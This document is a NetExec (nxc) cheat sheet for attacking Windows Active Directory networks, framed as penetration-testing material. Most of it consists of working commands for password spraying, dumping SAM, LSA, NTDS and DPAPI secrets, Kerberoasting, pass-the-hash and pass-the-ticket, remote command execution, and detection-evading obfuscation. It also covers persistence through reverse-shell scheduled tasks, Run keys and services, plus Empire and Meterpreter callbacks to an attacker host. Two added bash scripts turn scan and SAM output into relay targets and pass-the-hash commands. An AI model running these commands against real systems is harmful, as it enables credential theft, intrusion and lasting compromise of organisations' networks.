NetExec Cheat Sheet

Uploaded by John Olenski

What Is NetExec?

NetExec (aka nxc) is a network attack tool designed to automate the security assessment of large corporate networks.

It lets you perform enumeration, command execution, and post-exploitation in Windows environments through a rich feature set and support for protocols such as SMB, LDAP, WinRM, MSSQL, RDP, and SSH.

NetExec was born out of the famous CrackMapExec hacking tool.

CrackMapExec, known as the “Swiss Army knife” for targeting Windows Active Directory
environments, was extensively used in the penetration testing community. However, in 2023,
the project was archived, and maintenance stopped.

To carry on this project’s legacy and extend and improve its functionalities, contributors to
the original project decided to fork the code and continue the project under a new name,
NetExec.

They aim to sustain a community-driven and well-maintained project with regular updates
that penetration testers, red teamers, and aspiring hackers can use in the years to come.

With this goal in mind, NetExec offers users the following key features:

● Remote command execution: NetExec can execute arbitrary commands on remote machines over several protocols (SMB, WinRM, WMI, MSSQL, and SSH), including PowerShell commands through the -X option.
● Network enumeration: NetExec gathers information about network-connected systems, including live hosts, shared resources, and open service ports. This lets you map the network, identify weakly configured machines, and choose targets.
● Post-exploitation capabilities: NetExec automates repetitive tasks, deploys scripts, extracts credentials and other data, performs lateral movement, and lets you enumerate and impersonate Windows access tokens. These capabilities make it a natural fit once you have gained initial access during a penetration test.
● Powerful modules: NetExec ships with modules that automate common tasks, such as checking for known vulnerabilities, downloading and uploading files, and enumerating Active Directory.
● Integrations: NetExec integrates with post-exploitation tools and frameworks such as Metasploit, PowerShell Empire, and BloodHound, so you can use it to deliver their payloads and launchers and to collect BloodHound data.

These features go above and beyond the original CrackMapExec project with new modules,
wider network protocol support, and improved efficiency. Let’s explore how you can use
NetExec, dubbed by many as “CrackMapExec on steroids.”

Installing NetExec

NetExec is written in Python, so it offers the usual Python installation options.

It is also packaged in the Kali Linux repositories, so you can install it with the apt package manager.

Installing NetExec with a package manager

To install NetExec on Kali Linux, run the following commands:
sudo apt update
sudo apt install netexec

If you use a different penetration testing distribution, such as Parrot Security OS or BackBox Linux, you can add the official Kali Linux repositories to your sources list. Be aware that mixing repositories across Debian-based distributions can break package dependency resolution, so the pipx installation below is usually the safer route.

Installing NetExec as a Python package

To install NetExec as a Python package, first install pipx, the isolated Python application installer, with the command: sudo apt install pipx git

Next, run the following commands to install NetExec (together with its nxcdb database front-end) into an isolated virtual environment for your user:
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

Open a new shell so that the PATH change made by pipx ensurepath takes effect; the nxc command will then be available.


Installing NetExec from GitHub

If you want the bleeding-edge version of NetExec, install it from source by cloning the GitHub repository and using Poetry, the package manager NetExec uses to handle its dependencies.

First, install Poetry with the following commands:

sudo apt install pipx git
pipx ensurepath
pipx install poetry
poetry self add "poetry-dynamic-versioning[plugin]"
poetry dynamic-versioning enable

Next, clone the NetExec GitHub repository and use Poetry to install its dependencies and run the tool from the project's virtual environment:
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
poetry install
poetry run NetExec

Once NetExec is installed, you're ready to dive in and get your hands dirty.

General NetExec Syntax and Options

All NetExec commands follow the syntax:
nxc [runtime options] <protocol> <target> [options] [-M module] [-o module options]

[runtime options]
    Options that control how the command runs rather than what it does.
    -h displays the help menu.
    -t THREADS sets the number of concurrent threads.
    --timeout TIMEOUT sets a maximum timeout in seconds for each thread.
    --jitter INTERVAL adds a random delay between connections.

<protocol>
    The protocol NetExec speaks to the target. Each supports its own set of enumeration, exploitation, and lateral movement tasks: smb, ldap, winrm, rdp, mssql, wmi, ssh, vnc, ftp.

<target>
    The IP address, network range, or hostname of the machine(s) you are assessing, or a file containing one target per line. Examples: 192.168.1.100, 10.0.39.0/24, webserver1.

[options]
    Options are specific to the protocol you are targeting, but some are common to most of them.
    -u the username (or a file of usernames)
    -p the password (or a file of passwords)
    -h shows the help for that protocol
    -x COMMAND executes a command on the target
    -X PS_COMMAND executes a PowerShell command on the target

[-M module]
    Each protocol has modules you can use to check for vulnerabilities, go after credentials, or gather information. Some work from a low-privileged account; others require admin access.
    -M add-computer adds or deletes a domain computer account.
    -M firefox dumps credentials saved in Firefox.
    -M rdp enables or disables RDP.
    -M reg-query performs a registry query on the machine.
    -L lists the modules available for that protocol.

[-o module options]
    Options specific to the module you run, set with the syntax OPTION=value.
    -o NAME=<computer name> specifies the name of the computer account to add.
    -o DELETE=True sets a Boolean option (here, to delete the computer account instead of adding it).
    -M <module> --options displays the module's options.

(Screenshot: NetExec help menu)

(Screenshot: NetExec SMB protocol help menu)

(Screenshot: NetExec SMB module list)

Discovery and Enumeration With NetExec

Many of NetExec's most powerful capabilities live under its smb protocol, which lets you discover machines, enumerate domain and host information, and execute commands on remote machines.

You can use it to identify live hosts and collect data on domain users, groups, network shares, computers, and active sessions.

If the built-in options are not enough, you can also run Windows Management Instrumentation (WMI) queries to gather information about the target host itself (processes, services, installed software, and so on).

nxc <protocol> <target>
    Checks <target> for a specific service (winrm, ldap, ssh, rdp, mssql, ftp, smb). Run without credentials, this identifies live hosts and open service ports; for smb it also reports the OS build, domain, and whether SMB signing is required.

nxc smb <target> -u <USERNAME> -p <PASSWORD> --users [USER]
    Enumerates domain users with their descriptions. If a user is specified, only that user is returned. Use --pass-pol to read the domain password and lockout policy, and --loggedon-users to see who is logged on to the target machine.

nxc smb <target> -u <USERNAME> -p <PASSWORD> --groups [GROUP]
    Enumerates domain groups. If a group is specified, its members are returned. Use --local-groups to enumerate groups local to the target machine.

nxc smb <target> -u <USERNAME> -p <PASSWORD> --computers [COMPUTER]
    Enumerates domain computer accounts (workstations and servers).

nxc smb <target> -u <USERNAME> -p <PASSWORD> --shares
    Enumerates shares and the access (READ, WRITE) the account has to each.

nxc smb <target> -u <USERNAME> -p <PASSWORD> -M spider_plus
    Crawls every readable share and writes a JSON listing of all files found. Add -o DOWNLOAD_FLAG=True to also download the files (mind the size of file servers).

nxc smb <target> -u <USERNAME> -p <PASSWORD> --sessions
    Enumerates active sessions (users currently connected to the target's shares, and therefore potential targets).

nxc smb <target> -u <USERNAME> -p <PASSWORD> --wmi <QUERY>
    Executes a WMI query (WQL) against the target host, e.g. --wmi "select Name,ProcessId from Win32_Process".
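As an added example that is not part of the original cheat sheet or the NetExec project, the bash functions below turn the per-host lines that nxc smb prints into the target lists a practitioner usually needs next: hosts that do not enforce SMB signing (NTLM relay candidates), hosts still offering SMBv1, and hosts where the tested credential is local admin. SAMPLE_OUTPUT is constructed to match nxc's line layout (protocol, IP, port, hostname, message); the hosts, addresses and credential are made up.

```shell
#!/usr/bin/env bash
# Added example, not from the cheat sheet or the NetExec project: build target
# lists from a saved "nxc smb <range> -u <user> -p <pass>" run.
# SAMPLE_OUTPUT is constructed to match nxc's per-host line layout
# (protocol, IP, port, hostname, message); hosts and addresses are made up.

SAMPLE_OUTPUT='SMB         10.0.39.5       445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.0.39.10      445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.0.39.21      445    WS21             [*] Windows 10 Build 19041 x64 (name:WS21) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.39.5       445    DC01             [+] corp.local\jdoe:Winter2024!
SMB         10.0.39.10      445    FS01             [+] corp.local\jdoe:Winter2024! (Pwn3d!)
SMB         10.0.39.21      445    WS21             [-] corp.local\jdoe:Winter2024! STATUS_LOGON_FAILURE'

# Each helper reads nxc output on stdin and prints one IP per line.
# The IP is always the second whitespace-separated column of an nxc line,
# so awk can key on $2 directly.

# Hosts that do not enforce SMB signing: NTLM relay candidates
# (feed the list to ntlmrelayx -tf).
relay_candidates() {
    awk '/\(signing:False\)/ { print $2 }' | sort -u
}

# Hosts still offering SMBv1: a legacy-protocol finding on its own.
smbv1_hosts() {
    awk '/\(SMBv1:True\)/ { print $2 }' | sort -u
}

# Hosts where the credential is local admin: nxc appends "(Pwn3d!)" to the
# login line. These are the hosts where --sam, --lsa and -x will work.
admin_hosts() {
    awk '/\(Pwn3d!\)/ { print $2 }' | sort -u
}

# Real-world workflow (nxc itself is not run here):
#   nxc smb 10.0.39.0/24 -u jdoe -p 'Winter2024!' | tee smb.log
#   relay_candidates < smb.log > relay_targets.txt
#   admin_hosts      < smb.log > admin_targets.txt
demo() {
    printf '%s\n' "$SAMPLE_OUTPUT" | admin_hosts
}
demo
```

nxc already has --gen-relay-list FILE for the signing case; the point of parsing the saved log is that a single pass of nxc smb over the range yields all three lists without touching the hosts again.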

Credential Harvesting and Brute Forcing With NetExec

NetExec can perform a range of password and credential harvesting attacks. It can run arbitrary commands to gather information, password spray entire subnets, and dump credential material from compromised hosts.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> -x 'net localgroup administrators'
    Lists the members of the local Administrators group on each machine.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> -X 'Get-LocalGroupMember -Group "Administrators"'
    Does the same using PowerShell.

nxc ldap <target> -u <USERNAME> -p <PASSWORD> -M whoami
    Queries LDAP for the authenticated account's own attributes (group membership, description, account flags), the LDAP equivalent of running whoami /all.

nxc <protocol> <target> -u <USERNAME> -p <PASSWORD>
    Performs a password spray against <target>. <USERNAME> can be a single user, several users separated by spaces, or a file containing one username per line; <PASSWORD> works the same way. By default every username is tried with every password. Use the runtime options above (threads, jitter) to pace the attack and avoid lockouts or detection, and read the lockout policy first with nxc smb <dc> -u <USERNAME> -p <PASSWORD> --pass-pol.

nxc <protocol> <target> -u <USERNAME> -p <PASSWORD> --port <PORT>
    If the service is not running on its standard port, use --port to specify the custom port.

nxc <protocol> <target> -u <USERNAME> -p <PASSWORD> --no-bruteforce
    Tries username and password pairs line by line (user1:password1, user2:password2) instead of every combination.

nxc <protocol> <target> -u <USERNAME> -p <PASSWORD> --continue-on-success
    Keeps trying the remaining credentials after the first valid login; without it NetExec stops at the first success.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> --sam
    Dumps the local SAM hashes from the target after a successful login (requires local admin). Works over smb or winrm.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> --lsa
    Dumps LSA secrets (service account passwords, cached domain credentials, the machine account secret) from the target after a successful login (requires local admin). Works over smb or winrm.

nxc smb <target> -u <USERNAME> -p <PASSWORD> --ntds [drsuapi|vss]
    Dumps the NTDS.dit contents (all domain hashes) from a Domain Controller. drsuapi (the default) uses the DCSync replication protocol and needs an account with replication rights such as a Domain Admin; vss copies the file through a shadow copy. Use --user <USER> to dump only a specific account.

nxc smb <target> -u <USERNAME> -p <PASSWORD> --dpapi [cookies,nosystem]
    Dumps DPAPI-protected secrets (saved browser and Windows credentials) from the target. Add cookies to also dump browser cookies, or nosystem to skip the SYSTEM DPAPI keys (quieter, but machine-scope secrets are missed).

Gaining Access and Lateral Movement With NetExec

NetExec can authenticate to target systems over SMB, WinRM, LDAP, and the other supported protocols using usernames, passwords, NTLM hashes, or Kerberos tickets. That makes it a convenient tool for pass-the-hash and pass-the-ticket attacks.

Over the same protocols you can execute custom commands against one or many machines at once, using the administrative channels (SMB, WinRM, WMI) that already exist in a Windows Active Directory environment.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> --sam
    Dumps the local SAM hashes from the target after a successful login; the NT hashes can then be reused in a pass-the-hash attack against other machines that share the same local accounts.

nxc ldap <target> -u <USERNAME> -p <PASSWORD> --asreproast <OUTFILE>
    AS-REP roasting: requests AS-REP responses for accounts that do not require Kerberos pre-authentication and writes them to <OUTFILE> for cracking with Hashcat (mode 18200). No valid password is needed: -u <userlist> -p '' works against a list of candidate usernames.

nxc ldap <target> -u <USERNAME> -p <PASSWORD> --kerberoasting <OUTFILE>
    Kerberoasting: requests TGS tickets for accounts that have an SPN and writes them to <OUTFILE> for cracking with Hashcat (mode 13100). Any authenticated domain user can do this.

nxc <protocol> <target> -u <USERNAME> -H <HASH>
    Logs in with an NTLM hash instead of a password on protocols that accept NTLM (winrm, rdp, smb, ldap, mssql, wmi). -H takes a single hash, several hashes separated by spaces, or a file of hashes. This is pass-the-hash, used for lateral movement; add --local-auth when the account is a local rather than a domain account.

nxc <protocol> <target> -k --use-kcache
    Logs in with a Kerberos ticket (pass-the-ticket). -k selects Kerberos authentication and --use-kcache reads the ticket from the credential cache named by the KRB5CCNAME environment variable (e.g. export KRB5CCNAME=/tmp/user.ccache). Because the ticket is bound to a service principal name, <target> must be the host's DNS name, not its IP address. --aesKey <KEY> authenticates with a Kerberos AES key instead of a ticket.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> -x <COMMAND>
    Executes the specified command on the target after a successful login. Use --no-output if you do not need the command output returned.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> -X <PS_COMMAND>
    Executes a PowerShell command (PS_COMMAND) on the target after a successful login.

nxc smb <target> -u <USERNAME> -p <PASSWORD> --exec-method <METHOD> -x <COMMAND>
    Executes the command using a specific execution method: wmiexec, atexec, smbexec, or mmcexec. Each leaves a different footprint (a WMI process creation, a scheduled task, a service, or a DCOM call), which matters both for evasion and for what the defender will find in the logs.

nxc <protocol> <target> -u <USERNAME> -p <PASSWORD>
    Lateral movement: logs in to a remote system with stolen credentials; hosts where the account has local admin are marked (Pwn3d!).
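To connect the --sam, -H and -k rows above, here is an added bash example (not from the cheat sheet or from NetExec) that takes a SAM dump as nxc prints it, extracts the reusable NT hashes, flags accounts that share a hash, builds the pass-the-hash command for a range, and sanity-checks the two things that most often break pass-the-ticket: a target given as an IP instead of a DNS name, and a KRB5CCNAME that does not point at a readable ccache. SAM_OUTPUT, the account names and the hashes are constructed (only the empty-password hash is the real well-known value); kerberos_target_ok and the other function names are hypothetical helpers, not NetExec options.

```shell
#!/usr/bin/env bash
# Added example, not from the cheat sheet or the NetExec project: prepare
# pass-the-hash and pass-the-ticket from what "nxc smb <target> ... --sam" prints.
# SAM_OUTPUT is constructed; hashes are made up except the empty-password one.

SAM_OUTPUT='SMB         10.0.39.10      445    FS01             [+] Dumping SAM hashes
SMB         10.0.39.10      445    FS01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
SMB         10.0.39.10      445    FS01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.39.10      445    FS01             DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.39.10      445    FS01             localadmin:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
SMB         10.0.39.10      445    FS01             svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
SMB         10.0.39.10      445    FS01             [+] Added 5 SAM hashes to the database'

EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of an empty password

# Print "user:nthash" for every pwdump-style record (field 5 of an nxc line is
# user:rid:lmhash:nthash:::). Empty-password hashes are dropped: they belong to
# disabled or blank-password accounts that cannot be used over the network.
sam_to_creds() {
    awk -v empty="$EMPTY_NT" '{
        n = split($5, f, ":")
        if (n >= 4 && length(f[4]) == 32 && f[4] ~ /^[0-9a-f]+$/ && f[4] != empty)
            print f[1] ":" f[4]
    }'
}

# Unique NT hashes: the list to feed to -H when checking reuse across a range.
unique_nt_hashes() {
    sam_to_creds | cut -d: -f2 | sort -u
}

# Accounts that share an NT hash (same password): a finding in itself, and a
# hint that the hash will work under more than one name.
shared_hash_users() {
    sam_to_creds | awk -F: '{ u[$2] = u[$2] " " $1; c[$2]++ }
        END { for (h in c) if (c[h] > 1) print h ":" substr(u[h], 2) }'
}

# Pass-the-hash command for one local account against a range.
# --local-auth because SAM accounts are local, not domain, accounts.
pth_command() {
    local range=$1 user=$2 nthash=$3
    printf 'nxc smb %s -u %s -H %s --local-auth\n' "$range" "$user" "$nthash"
}

# Pre-flight for pass-the-ticket (nxc ... -k --use-kcache): the ticket is
# issued for an SPN such as cifs/fs01.corp.local, so the target must be a
# DNS name, and KRB5CCNAME must name a readable ccache (optionally "FILE:"-prefixed).
kerberos_target_ok() {
    local target=$1 ccache
    case "$target" in
        *[!0-9.]*) ;;   # contains something other than digits and dots: a name
        *) echo "target $target is an IP; use the host's DNS name for Kerberos" >&2; return 1 ;;
    esac
    ccache=${KRB5CCNAME#FILE:}
    if [ -z "$KRB5CCNAME" ] || [ ! -r "$ccache" ]; then
        echo "KRB5CCNAME does not point at a readable ccache" >&2
        return 1
    fi
    return 0
}

# Usage:
#   nxc smb 10.0.39.10 -u localadmin -p 'S3rv1ce!' --sam | tee sam.log
#   shared_hash_users < sam.log
#   for h in $(unique_nt_hashes < sam.log); do pth_command 10.0.39.0/24 Administrator "$h"; done
#   export KRB5CCNAME=/tmp/jdoe.ccache
#   kerberos_target_ok fs01.corp.local && nxc smb fs01.corp.local -k --use-kcache
```

Note that the pass-the-hash command is only printed, not executed; review the list of hashes and targets before spraying an NT hash across a range, since every failed NTLM logon still counts against the lockout policy for domain accounts.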

Post-Exploitation With NetExec

After gaining access to a target machine, you move to the post-exploitation stage of the penetration test. NetExec helps here too: it can establish persistence, gather information on networks, systems, and installed applications, and upload and download files.

nxc smb <target> -u <USERNAME> -p <PASSWORD> -M rdp -o ACTION=enable
    Enables RDP on the target after a successful login (ACTION=disable turns it back off), useful for getting an interactive session on the target.

nxc smb <target> -u <USERNAME> -p <PASSWORD> -M impersonate
    Logs in and lists the access tokens present on the machine that you could impersonate to escalate privileges or act as another user.

nxc smb <target> -u <USERNAME> -p <PASSWORD> -M install_elevated
    Checks the AlwaysInstallElevated registry values (under HKLM and HKCU Software\Policies\Microsoft\Windows\Installer); if both are set, any user can install an MSI package as SYSTEM, an easy privilege escalation.

nxc smb <target> -u <USERNAME> -p <PASSWORD> -M enum_av
    Gathers information on the anti-virus and endpoint detection products installed on the machine (this module was called enum_avproducts in CrackMapExec).

nxc smb <target> -u <USERNAME> -p <PASSWORD> -M enum_dns
    Logs in and uses WMI to dump the DNS records from an AD DNS server.

nxc smb <target> -u <USERNAME> -p <PASSWORD> -M get_netconnections
    Uses WMI to list the target machine's current network connections.

nxc smb <target> -u <USERNAME> -p <PASSWORD> -M keepass_discover
    Searches for KeePass-related files and processes from which you could steal credentials.

nxc ldap <target> -u <USERNAME> -p <PASSWORD> -M get-network
    Retrieves the Active Directory network layout (DNS records and their IP addresses) from the domain.

nxc ldap <target> -u <USERNAME> -p <PASSWORD> -M laps
    Retrieves Local Administrator Password Solution (LAPS) passwords for the computers your account is allowed to read them for.

nxc mssql <target> -u <USERNAME> -p <PASSWORD> -M mssql_priv
    Enumerates, and can exploit, MSSQL impersonation privileges to escalate to sysadmin.

nxc smb <target> -u <USERNAME> -p <PASSWORD> --get-file REMOTE LOCAL
    Downloads a file from the target, e.g. --get-file \\Windows\\Temp\\creds.txt creds.txt (paths are relative to the C$ share).

nxc smb <target> -u <USERNAME> -p <PASSWORD> --put-file LOCAL REMOTE
    Uploads a local file to the target, e.g. --put-file backdoor.exe \\Windows\\Temp\\backdoor.exe.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> -x 'schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr <PAYLOAD>'
    Persistence: creates a scheduled task that runs the reverse shell PAYLOAD at the given interval (or on a system event); upload the PAYLOAD to the machine first.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> -x 'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v <name> /t REG_SZ /d "<PAYLOAD>"'
    Persistence: runs the PAYLOAD from a Run key whenever a user logs on; upload the PAYLOAD to the machine first.

nxc smb <target> -u <USERNAME> -p <PASSWORD> --put-file <PAYLOAD> "\\Users\\<user>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<PAYLOAD>"
    Persistence: drops the PAYLOAD in the user's Startup folder so it runs at logon. --put-file writes through the C$ share, so give the literal path; environment variables such as %APPDATA% are not expanded.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> -x 'sc create <service_name> binPath= "<PAYLOAD>" start= auto'
    Persistence: installs a service that runs the PAYLOAD at boot; upload the PAYLOAD to the machine first.

NetExec Advanced Techniques

NetExec has many advanced features that distinguish it from its predecessor, CrackMapExec. These include a built-in BloodHound collector for Active Directory enumeration, extraction of Microsoft Teams data, and screenshots of target systems over RDP.

nxc <smb|winrm> <target> -u <USERNAME> -p <PASSWORD> -X <PS_COMMAND> --obfs
    Obfuscates the PowerShell scripts and commands NetExec runs, to get past simple signature-based detection.

nxc ldap <target> -u <USERNAME> -p <PASSWORD> --bloodhound -c All --dns-server <DC_IP>
    Runs NetExec's built-in BloodHound collector to gather data about the Active Directory environment you are enumerating; point --dns-server at a domain controller so that hostnames resolve.

nxc smb <target> -u <USERNAME> -p <PASSWORD> -M teams_localdb
    Reads the Microsoft Teams local cookie database from the user's profile to retrieve the user's Teams token, which gives access to user, message, and group information (runs over smb, since it reads files from the profile).

nxc mssql <target> -u <USERNAME> -p <PASSWORD> --local-auth -x whoami
    Executes Windows commands on an MSSQL server through xp_cmdshell, authenticating with a SQL (not Windows) login.

nxc rdp <target> -u <USERNAME> -p <PASSWORD> --screenshot [--screentime <seconds>]
    Takes a screenshot of the target's desktop over RDP. If Network Level Authentication (NLA) is disabled, --nla-screenshot captures the logon screen without valid credentials.

nxc <mssql|smb> <target> -u <USERNAME> -p <PASSWORD> -M empire_exec -o LISTENER=<listener>
    Logs in with the stolen credentials, then generates and executes a PowerShell Empire launcher that calls back to the specified <listener>, giving you an Empire agent on the system.

nxc <mssql|smb> <target> -u <USERNAME> -p <PASSWORD> --local-auth -M met_inject -o LHOST=<attack-machine> LPORT=<listening-port>
    Logs in with the stolen credentials, then generates and injects Metasploit shellcode that calls back to your Metasploit handler on LHOST:LPORT, giving you a Meterpreter session. Check -M met_inject --options for the exact option names in your version.

NetExec Cheat Sheet Conclusion
This cheat sheet includes everything you need to get started with NetExec. You now know
how to perform enumeration, credential harvesting, and post-exploitation, all with one
powerful hacking tool.

It’s time to trade in your old CrackMapExec and use NetExec for all your network penetration
testing needs.

If you want to learn more about network penetration testing, red teaming, and ethical
hacking, check out the StationX Accelerator Program. It includes everything you need to
jumpstart your cyber security career with professional mentorship, a tailored career
roadmap, a vibrant community, and 1,000+ courses and labs.
